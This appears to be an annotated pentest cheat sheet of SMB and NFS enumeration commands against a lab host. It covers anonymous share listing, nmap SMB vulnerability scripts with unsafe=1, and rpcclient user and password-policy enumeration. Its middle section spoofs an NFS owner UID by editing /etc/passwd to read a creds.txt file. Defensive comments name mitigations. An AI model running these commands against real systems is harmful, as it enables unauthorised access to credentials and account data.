# SMB share and service enumeration against a single host ($ip, or the
# literal 10.10.10.4 used in some lines).

# List the host's shares and the access the session is granted on each.
# No credentials are supplied on this line.
$ smbmap -H $ip
# Same listing, authenticating as <user> (placeholder to be filled in).
$ smbmap -u <user> -H $ip
# List the services/shares the server advertises; prompts for a password.
$ smbclient -L $ip
# -N suppresses the password prompt, so the listing is attempted without one.
$ smbclient -N -L //10.10.10.4
# Show which SMB-related NSE scripts are installed locally.
$ ls -l /usr/share/nmap/scripts/smb*
# Run the NSE scripts whose names match smb-vul* against ports 139 and 445.
# NOTE(review): the pattern is unquoted, so the shell expands it first if any
# file in the current directory matches; quoting it ('smb-vul*') hands the
# wildcard to nmap unchanged.
$ nmap -p 139,445 --script smb-vul* $ip
# -A enables OS detection, version detection, script scanning and traceroute.
$ nmap -A 10.10.10.4
# Run the smb-os-discovery script, referenced by its full path.
# NOTE(review): unsafe=1 is a script argument read by some SMB vulnerability
# scripts; smb-os-discovery presumably ignores it -- confirm before keeping it.
$ nmap -p 139,445 $ip --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery
# Mounting remote shares locally (CIFS, then NFS) and reading a file whose
# owner UID has no matching local account.

# Mount an SMB share over CIFS. The share path is quoted because it contains
# a space; "ip" and USERNAME are placeholders.
# NOTE(review): sec=ntlm selects NTLMv1 authentication; recent kernels may
# reject this option -- confirm against the kernel in use.
# NOTE(review): dir_mode=0077 as written gives the owner no access to
# directories and group/other full access; possibly a typo -- confirm.
$ mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//ip/My Share" /mnt/cifs
# Mount the NFS export /home from $ip onto ~/home/ (the mount point must
# already exist). nolock disables NFS file locking for this mount.
$ mount -o nolock $ip:/home ~/home/
# Listing line from the mounted export: creds.txt is readable only by its
# owner, shown as numeric uid/gid 1014 because no local account has that id.
-rwx------ 1 1014 1014 48 Jun 10 09:16 creds.txt
# Create a local account, then rewrite its id to 1014 so it matches the
# file's owner. With AUTH_SYS, the usual NFS authentication flavour, the
# server trusts the UID the client sends, so it treats this local account as
# the owner.
# Server side, restricting the export to trusted hosts and requiring
# Kerberos (sec=krb5) removes that trust in client-supplied UIDs.
$ sudo adduser pwn
# Presumably adduser allocated UID/GID 1001 to pwn -- the page does not show it.
# NOTE(review): the pattern is unanchored and global, so every "1001" in
# /etc/passwd is rewritten, not only the uid/gid fields of pwn's entry.
$ sudo sed -i -e 's/1001/1014/g' /etc/passwd
# Switch to the remapped account and read the file as its apparent owner.
$ su pwn
$ cat creds.txt
# Interactive SMB sessions, followed by RPC enumeration commands.

# Open an interactive session on the share named tmp ("ip" is a placeholder).
$ smbclient //ip/tmp
# Connect to the IPC$ share as user john. The two lines are equivalent: the
# first uses backslash separators, doubled so the shell passes them through,
# the second uses forward slashes.
$ smbclient \\\\ip\\ipc$ -U john
$ smbclient //ip/ipc$ -U john
# NOTE(review): the remaining lines are rpcclient commands, typed at an
# rpcclient prompt rather than at the shell or inside smbclient; the
# rpcclient invocation itself is not shown on this page.
# A server that answers these for anonymous or low-privilege sessions is
# disclosing its user list and password policy; restricting anonymous access
# (Samba "restrict anonymous", Windows RestrictAnonymous) limits that.
# srvinfo: server information.
$ srvinfo
# enumdomusers: enumerate the domain's user accounts.
$ enumdomusers
# getdompwinfo: domain password information.
$ getdompwinfo
# querydominfo: general domain information.
$ querydominfo
# netshareenum / netshareenumall: enumerate shares / all shares.
$ netshareenum
$ netshareenumall